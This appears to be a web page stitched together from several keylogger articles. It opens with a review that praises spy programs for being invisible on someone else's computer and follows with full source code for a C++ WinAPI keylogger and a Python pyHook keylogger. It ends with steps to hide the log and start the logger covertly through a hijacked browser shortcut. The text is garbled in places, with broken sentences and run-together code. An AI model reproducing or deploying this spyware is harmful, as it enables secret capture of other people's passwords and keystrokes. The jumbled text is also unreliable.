Information Security Laboratory.              Information Security Laboratory How long did it take?

Various spy programs are necessary in conditions where many people have access to one computer.

In these conditions, the user may want to know which sites were visited from his computer (for example, by children), whether theft occurred from credit cards using saved passwords, etc. to clarify these issues you will need.

Our review will allow you to make the best choice.

Features of choice

What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.

It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.

Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.

That is, the action of such software is aimed at collecting information entered through the keyboard.

There are such utilities different types– with the help of some you can view all the text typed from the keyboard, with others – only what was typed in the browser or in any selected application.

Some programs provide the ability to configure such indicators, others do not.

They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.

Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.

Given such diversity, choosing the most suitable software can be quite difficult.

This material presents the TOP best programs, which can be used for this purpose. It is easier to choose the right one among them.

Specifications

To simplify the selection process software The table below shows the main comparative characteristics of all programs included in the TOP.

Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.

These utilities are described in more detail below.

SC-KeyLog

This is a voluminous and functional spy program that is distributed free of charge.

In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, and open browser windows.

Provides complete information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.

• Opportunity remote access to a file from another device;
• No traces of program activity on the computer with the correct settings;
• Variety of collected data – information about almost all actions on the PC can be accessed.

• Saves passwords only up to NT0;
• Too simple menu and unaesthetic design;
• A rather inconvenient format for displaying the result.

What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”

WideStep Handy Keylogger

This application is distributed free of charge. The full paid version costs $35.

Quite an interesting and functional program that is worth the money if you are willing to pay it.

Distinctive feature– the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stable than other programs on this list.

• Collection of various types of information;
• Complete invisibility of work on the user’s computer;
• Simple interface and controls.

• The design is better than the previous program, but still not great;
• The result display format is inconvenient;
• The paid version is quite expensive.

Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”

Actual Spy

This is a functional and complex paid program that costs 600 rubles. However, it has a demo version that is free.

Feature of this software– ability in a given period of time.

This helps solve the problem of entering a graphic password/key, which has recently become widespread.

• Many types of information collected plus the ability to take screenshots from the screen during a specified period;
• A large number of others additional functions and features;
• Records not only actions, but also the time they were performed;
• Encrypts the generated log.

• The duration of work (collection of information) in the free demo version is 40 minutes;
• Paid distribution, although a more or less reasonable price;
• The weight of the program is quite large.

User reviews about this application are: “The program is excellent. Well done programmers!”

EliteKeylogger

Paid program with a fairly high price– 69 dollars. It operates completely undetectably on a PC in low-level mode, making it almost completely undetectable.

Interesting and convenient feature– automatic launch of software, occurring simultaneously with the launch of the system itself.

It is difficult to detect or not detected at all even by special anti-keyloggers.

• Completely hidden action and difficult to detect;
• Low-level driver-type operating format and automatic startup when the system boots;
• It also tracks the presses of not only the main, but also the service keys on the keyboard.

• Enough a complex system installing the program on a PC;
• The program is expensive, but you can find an old hacked version on the Russian Internet;
• A rather complex system of individual program settings, which, however, justifies itself.

What do users say about this software? " Good program", "A little short of Jetlogger."

The Rat!

Quite a common and popular, functional utility with a paid license.

However, for private use, a free demo version is provided for a limited period.

The program is very simple– any advanced user can write the same. However, it is completely undetectable by antiviruses and special programs, detecting such software.

• Simplicity, functionality and high stability;
• Minimum file weight and space occupied by it on the computer;
• Quite a lot of settings.

• A rather unpleasant design, made in black, white and red;
• The functionality is somewhat narrower than in the programs described before;
• Inconvenient viewing of the log and generally inconvenient interface and use.

Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”

SPYGO

This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.

Published January 18, 2015. Where?" There is no need to look for easy ways, especially on the Internet :). Download keylogger for free you can, but be prepared for various restrictions or surprises. Firstly, the functionality of the keylogger will be low. Free demos full-fledged programs usually contain restrictions, sometimes unexpected :). Secondly, there will be no additional, usually accompanying keyloggers additional programs or log processing functions, tracking settings, etc. Thirdly, you will not find keylogger support from manufacturers. Instead of looking where download keylogger for free, think about writing it yourself? simplest keylogger for Windows It’s not very difficult to write if you have the basics of Windows programming. So, we continue to publish the keylogger sources. Keylogger for Windows written in C++, naturally using the Win API. The key hook is implemented using SetWindowsHookEx(WH_KEYBOARD_LL,...). An executable file is created without a dll library, so to speak, a keylogger in one file! The advantages are obvious - it’s easier to organize remote installation, smaller size, greater secrecy (the dll will not hang in the processes of all applications). The disadvantage of this interception method is that it is unstable, or generally refuses to work in Windows 7. Intercepting keys without using a dll (WH_KEYBOARD_LL) causes misunderstanding among the seven. You have to use shamanism and magic to make the keylogger work. Of course, there is always a way out (look for it yourself, and may the force be with you :)). You can also write a normal one using SetWindowsHookEx (WH_KEYBOARD_LL ,...). Everything will be fine in Windows 7. How WH_KEYBOARD_LL will work in Windows 8 is not yet known.

Logging is organized through a file stream. Added some things to improve log readability. The code is small and efficient. Suitable for a keylogger for windows with certain additives and the question is where can I download keylogger for free disappears.

Source file *.exe:

#include< windows.h >#include< fstream >#include< iostream >#include< algorithm >#include< string >using namespace std; string myKey; BOOL isCaps(); char logName = "keys.txt";//LOG FILE name //init all variables for speed MSG message; HHOOK keyboardHook; char keyNameBuff; PKBDLLHOOKSTRUCT p; unsigned int sc; //keylogger for Windows void writeToLog(string s) //write a string to the log ( ofstream log(logName, ios::app); //opens log file log<< s; //writes to log.. with format "[""]" log.close(); //closes log } // Кейлоггер для Windows BOOL isCaps() { if ((GetKeyState(VK_CAPITAL) & 0x0001)!=0 || ((GetKeyState(VK_SHIFT) & 0x8000)!=0)) { return 1; } else { return 0; } } // Кейлоггер для Windows LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)//proc to be run on hooked key { if (wParam == WM_KEYDOWN)//if key event type is key down { //get the keyname from lParam p = (PKBDLLHOOKSTRUCT) (lParam);//used to get the vkCode sc = MapVirtualKey(p->vkCode, 0); sc<<= 16; //shift 16 bits if (!(p->vkCode<= 32))//if not ascii { sc |= 0x1 << 24; // <- extended bit } GetKeyNameTextA(sc,keyNameBuff,16); // Кейлоггер для Windows - исходник //gets ASCII key name from sc into keyNameBuff //write keyname to log myKey = keyNameBuff; if (myKey == "Space") { writeToLog(" "); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } // if its none of the special keys else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } return CallNextHookEx(NULL, nCode, wParam, lParam); } // Кейлоггер для Windows void msgLoop() { while (GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // Кейлоггер для Windows int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); //hooks keyboard msgLoop(); //stops from closing // Кейлоггер для Windows - исходник UnhookWindowsHookEx(keyboardHook); //unhooks return 0; //Never run }

You can use any development environment you like (Dev-C++, MSVS, Borland C++). We collect, make the necessary individual changes andkeylogger for Windowsready and spend time searching for where you candownload

Hello, Khabrovsk residents.

I decided to write a software keyboard logger in C++ using WinAPI. I can’t say that I was pursuing some kind of espionage goal when I wrote it; rather, I was getting acquainted with WinAPI hooks. Since it turned out not so bad, and there is no article on Habré about software loggers, I decided to write my own.

How is this done?

HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);

In order to intercept all keyboard keystrokes, it is convenient to specify WH_KEYBOARD or WH_KEYBOARD_LL as the idHook parameter. The only difference is that WH_KEYBOARD_LL also intercepts system key presses (i.e. Alt or any key while Alt is held down), so we will select it.

Lpfn is a pointer to a function that processes intercepted messages (in our case, keystrokes).
hMod is an application instance handle containing a processing function.
dwThreadId is the identifier of the thread whose messages we want to intercept. This parameter must be set to 0 to intercept messages from all threads.

The return value is a handle to our hook, which will need to be freed with the UnhookWindowsHookEx function when exiting.
Looking at MSDN for help, we see a prototype of a function that processes messages from this hook.

LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);

nCode must be equal to HC_ACTION, otherwise the message is given to another process.
wParam is one of the following values: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP.
lParam is a pointer to the KBDLLHOOKSTRUCT structure, in the fields of which we are interested only in 2 parameters: vkCode (virtual code) and scanCode of the pressed key.
This function must return the value of the CallNextHookEx function, otherwise the next hook that processes the event may receive incorrect message parameters.
Every time a key is pressed, our program will intercept this event and process it with our LowLevelKeyboardProc procedure.

In order to retranslate the virtual and scan code of a key into symbolic form, we need the ToAsciiEx function.

Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);

The first 2 parameters are the virtual and scan codes of the key, respectively.
lpKeyState — keyboard state, checks which keys are pressed/active.
lpChar is a pointer to a double word into which the function will write the symbolic representation of the key.
uFlags is a parameter indicating menu activity.
dwhkl — keyboard layout identifier.
The return value is the number of characters written to the lpChar buffer. We are interested in the case when 1 character is written.
Basically, these are the 3 main functions required for the simplest keyboard logger.

A little about the program

Hello, QUAZAR is here again. Today I will show you how to create a simple keylogger in Python. Of course, this keylogger cannot compete with such giants as, but despite this, it can find its use.

What is a keylogger?

You can read in detail about what a keylogger is and about the types of keyloggers in the article ““. To find additional materials on the topic, use the site search, which is located in the upper right corner. Just enter the word "keylogger" or "keylogger".

Simple keylogger in Python

To create a keylogger we need:

• Operating system: Windows or MacOs (any Linux can also be used, but I haven't tried it personally)
• Python installed on the target machine, as well as special libraries.

This material is for informational purposes only. The information presented in this article is provided for informational purposes only. Neither the editors of the website www.site nor the author of the publication bear any responsibility for any harm caused by the material in this article.

Creating a simple keylogger in Python

First you need to download and install Python.

After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32 and 64 bit versions for Windows and other OSes. Download "PYhook" and "pyWin32" according to your installed version of Python and Windows (32bit or 64bit).

Once downloaded, install and open IDLE (Python GUI) menu from the Start menu.

Go to the “File” menu and click on the “New File” item. Then paste the keylogger code:

#Name: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

And save it by calling the file Keylogger.pyw. Just don't save the file in the root directory C: where you need administrator rights to copy and delete files. Create a new folder on your C: drive or some other location where you don't need administrator rights to copy files and save Keylogger.pyw there.

You can select any location as the output report file “file_log = “C:keyloggerlog.txt”, but preferably, of course, some hidden location on your hard drive. In this example, I will save the report file to disk in the root directory C:. After all, I have nothing to hide.

Automatic launch of a keylogger in Python

The keylogger is ready. Now we need to make sure that the keylogger starts hidden from the user and automatically when Windows boots. This can be implemented in different ways. Let's try to do it using a bat file by linking the launch of the keylogger to some program or by registering it in startup.

First, create a bat file. Copy and paste the following code into Notepad:

::Name: QUAZAR
::Website: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

In the first line you need to enter the path to the keylogger.pyw file (in my case “C:keylogger.pyw”). In the second line, you must enter the path to the program that the user usually uses (in my case, the Opera browser).

After editing, save the file with a .bat extension (in my case logger.bat) in some hidden location on your computer (in my case in “C:keylogger.bat”).

Now go to the desktop and select a shortcut for a frequently used program (in my case, this is the Opera browser). Right-click the mouse to call up the context menu and go to the shortcut properties. In the “Object” field, enter the path to the keylogger bat file “C:keyloggerlogger.bat”.

After making changes, the shortcut icon will also change. But this can be easily solved on the properties tab (see screenshot above).